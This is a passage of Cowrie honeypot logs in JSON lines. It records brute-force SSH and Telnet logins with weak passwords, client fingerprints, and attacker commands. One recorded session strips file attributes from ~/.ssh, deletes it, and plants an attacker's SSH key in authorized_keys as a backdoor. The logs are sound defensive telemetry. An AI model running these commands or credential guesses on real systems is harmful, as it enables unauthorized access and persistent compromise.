ncCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:11.894574Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX3edc","message":"login attempt [root/!QAZ@WSX3edc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:37:12.616184Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:37:12.644814Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:37:13.163118Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.163834Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:37:13.294987Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.295669Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.296446Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.415029Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.415995Z","src_ip":"212.227.235.229","session":"aa861ad64b96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:13.591302Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:37:14.198138Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:37:14.198855Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:37:14.494831Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:14.495709Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.connect","src_ip":"61.72.55.130","src_port":49692,"dst_ip":"1.2.3.4","dst_port":22,"session":"abb264d39320","protocol":"ssh","message":"New connection: 61.72.55.130:49692 (1.2.3.4:22) [session: abb264d39320]","sensor":"my-vps","timestamp":"2025-08-28T06:37:14.793107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:37:14.794494Z","src_ip":"61.72.55.130","session":"abb264d39320"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:37:15.089167Z","src_ip":"61.72.55.130","session":"abb264d39320"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:16.307805Z","src_ip":"61.72.55.130","session":"abb264d39320"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:17.605567Z","src_ip":"61.72.55.130","session":"abb264d39320"}
{"eventid":"cowrie.session.connect","src_ip":"61.72.55.130","src_port":49708,"dst_ip":"1.2.3.4","dst_port":22,"session":"87aae8495bad","protocol":"ssh","message":"New connection: 61.72.55.130:49708 (1.2.3.4:22) [session: 87aae8495bad]","sensor":"my-vps","timestamp":"2025-08-28T06:37:17.917074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:37:17.917705Z","src_ip":"61.72.55.130","session":"87aae8495bad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:37:18.221177Z","src_ip":"61.72.55.130","session":"87aae8495bad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51988,"dst_ip":"1.2.3.4","dst_port":22,"session":"8122780e7b0e","protocol":"ssh","message":"New connection: 212.227.125.160:51988 (1.2.3.4:22) [session: 8122780e7b0e]","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.408186Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51962,"dst_ip":"1.2.3.4","dst_port":22,"session":"b78c0412cad2","protocol":"ssh","message":"New connection: 212.227.125.160:51962 (1.2.3.4:22) [session: b78c0412cad2]","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.409280Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51978,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b6f2607bcbd","protocol":"ssh","message":"New connection: 212.227.125.160:51978 (1.2.3.4:22) [session: 2b6f2607bcbd]","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.410049Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52002,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db831c1b20a","protocol":"ssh","message":"New connection: 212.227.125.160:52002 (1.2.3.4:22) [session: 6db831c1b20a]","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.411890Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.473948Z","src_ip":"61.72.55.130","session":"87aae8495bad"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.763340Z","src_ip":"61.72.55.130","session":"b0b64a2b8609"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:19.777868Z","src_ip":"61.72.55.130","session":"87aae8495bad"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:20.131220Z","src_ip":"212.227.125.160","session":"6db831c1b20a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:20.132386Z","src_ip":"212.227.125.160","session":"2b6f2607bcbd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:20.133284Z","src_ip":"212.227.125.160","session":"b78c0412cad2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:20.134643Z","src_ip":"212.227.125.160","session":"8122780e7b0e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":40496,"dst_ip":"1.2.3.4","dst_port":23,"session":"367f45b1041d","protocol":"telnet","message":"New connection: 8.222.212.69:40496 (1.2.3.4:23) [session: 367f45b1041d]","sensor":"my-vps","timestamp":"2025-08-28T06:37:20.766988Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50630,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce8df1fbf8c5","protocol":"ssh","message":"New connection: 212.227.125.160:50630 (1.2.3.4:22) [session: ce8df1fbf8c5]","sensor":"my-vps","timestamp":"2025-08-28T06:37:21.515590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:21.516400Z","src_ip":"212.227.125.160","session":"ce8df1fbf8c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:37:21.741956Z","src_ip":"212.227.125.160","session":"ce8df1fbf8c5"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:37:22.388881Z","src_ip":"212.227.125.160","session":"ce8df1fbf8c5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:37:23.606225Z","src_ip":"212.227.125.160","session":"ce8df1fbf8c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42620,"dst_ip":"1.2.3.4","dst_port":22,"session":"542fc71961f6","protocol":"ssh","message":"New connection: 212.227.125.160:42620 (1.2.3.4:22) [session: 542fc71961f6]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.156594Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42632,"dst_ip":"1.2.3.4","dst_port":22,"session":"c289f92ecb06","protocol":"ssh","message":"New connection: 212.227.125.160:42632 (1.2.3.4:22) [session: c289f92ecb06]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.158001Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42684,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8f9fb433cbf","protocol":"ssh","message":"New connection: 212.227.125.160:42684 (1.2.3.4:22) [session: c8f9fb433cbf]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.158945Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42604,"dst_ip":"1.2.3.4","dst_port":22,"session":"f335c25db582","protocol":"ssh","message":"New connection: 212.227.125.160:42604 (1.2.3.4:22) [session: f335c25db582]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.160233Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42648,"dst_ip":"1.2.3.4","dst_port":22,"session":"c54df3a0f614","protocol":"ssh","message":"New connection: 212.227.125.160:42648 (1.2.3.4:22) [session: c54df3a0f614]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.161146Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42716,"dst_ip":"1.2.3.4","dst_port":22,"session":"4532aeebaa9f","protocol":"ssh","message":"New connection: 212.227.125.160:42716 (1.2.3.4:22) [session: 4532aeebaa9f]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.162113Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42664,"dst_ip":"1.2.3.4","dst_port":22,"session":"17249cdb7723","protocol":"ssh","message":"New connection: 212.227.125.160:42664 (1.2.3.4:22) [session: 17249cdb7723]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.162805Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42672,"dst_ip":"1.2.3.4","dst_port":22,"session":"76e08ed131d0","protocol":"ssh","message":"New connection: 212.227.125.160:42672 (1.2.3.4:22) [session: 76e08ed131d0]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.163515Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42700,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab38c0641b97","protocol":"ssh","message":"New connection: 212.227.125.160:42700 (1.2.3.4:22) [session: ab38c0641b97]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.164233Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42736,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cf1c4e3e4fb","protocol":"ssh","message":"New connection: 212.227.125.160:42736 (1.2.3.4:22) [session: 8cf1c4e3e4fb]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.165056Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42642,"dst_ip":"1.2.3.4","dst_port":22,"session":"f12212c664b6","protocol":"ssh","message":"New connection: 212.227.125.160:42642 (1.2.3.4:22) [session: f12212c664b6]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.165812Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42724,"dst_ip":"1.2.3.4","dst_port":22,"session":"d68f644b4d4e","protocol":"ssh","message":"New connection: 212.227.125.160:42724 (1.2.3.4:22) [session: d68f644b4d4e]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.166403Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42708,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8f9cdcf1856","protocol":"ssh","message":"New connection: 212.227.125.160:42708 (1.2.3.4:22) [session: e8f9cdcf1856]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.167382Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42738,"dst_ip":"1.2.3.4","dst_port":22,"session":"310483fac28c","protocol":"ssh","message":"New connection: 212.227.125.160:42738 (1.2.3.4:22) [session: 310483fac28c]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.168207Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42752,"dst_ip":"1.2.3.4","dst_port":22,"session":"803d90a55aa5","protocol":"ssh","message":"New connection: 212.227.125.160:42752 (1.2.3.4:22) [session: 803d90a55aa5]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.168794Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42756,"dst_ip":"1.2.3.4","dst_port":22,"session":"d983b71feb61","protocol":"ssh","message":"New connection: 212.227.125.160:42756 (1.2.3.4:22) [session: d983b71feb61]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.169580Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42758,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6fd9b08c1cc","protocol":"ssh","message":"New connection: 212.227.125.160:42758 (1.2.3.4:22) [session: a6fd9b08c1cc]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.170379Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42766,"dst_ip":"1.2.3.4","dst_port":22,"session":"68634ceb5d19","protocol":"ssh","message":"New connection: 212.227.125.160:42766 (1.2.3.4:22) [session: 68634ceb5d19]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.170980Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42768,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5bdcd9e579e","protocol":"ssh","message":"New connection: 212.227.125.160:42768 (1.2.3.4:22) [session: e5bdcd9e579e]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.171937Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42770,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d03587c2d8","protocol":"ssh","message":"New connection: 212.227.125.160:42770 (1.2.3.4:22) [session: f1d03587c2d8]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.172895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.173868Z","src_ip":"212.227.125.160","session":"542fc71961f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.174462Z","src_ip":"212.227.125.160","session":"c289f92ecb06"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.175032Z","src_ip":"212.227.125.160","session":"c8f9fb433cbf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.175508Z","src_ip":"212.227.125.160","session":"f335c25db582"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.176155Z","src_ip":"212.227.125.160","session":"c54df3a0f614"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.176726Z","src_ip":"212.227.125.160","session":"4532aeebaa9f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.177378Z","src_ip":"212.227.125.160","session":"17249cdb7723"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.177901Z","src_ip":"212.227.125.160","session":"76e08ed131d0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.178500Z","src_ip":"212.227.125.160","session":"ab38c0641b97"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.179062Z","src_ip":"212.227.125.160","session":"8cf1c4e3e4fb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.179528Z","src_ip":"212.227.125.160","session":"f12212c664b6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.179996Z","src_ip":"212.227.125.160","session":"d68f644b4d4e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.180619Z","src_ip":"212.227.125.160","session":"e8f9cdcf1856"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.181213Z","src_ip":"212.227.125.160","session":"310483fac28c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.181766Z","src_ip":"212.227.125.160","session":"803d90a55aa5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.182300Z","src_ip":"212.227.125.160","session":"d983b71feb61"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.182831Z","src_ip":"212.227.125.160","session":"a6fd9b08c1cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.183372Z","src_ip":"212.227.125.160","session":"68634ceb5d19"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.183855Z","src_ip":"212.227.125.160","session":"e5bdcd9e579e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.184379Z","src_ip":"212.227.125.160","session":"f1d03587c2d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42796,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ed3d9d00f33","protocol":"ssh","message":"New connection: 212.227.125.160:42796 (1.2.3.4:22) [session: 6ed3d9d00f33]","sensor":"my-vps","timestamp":"2025-08-28T06:37:24.948008Z"}
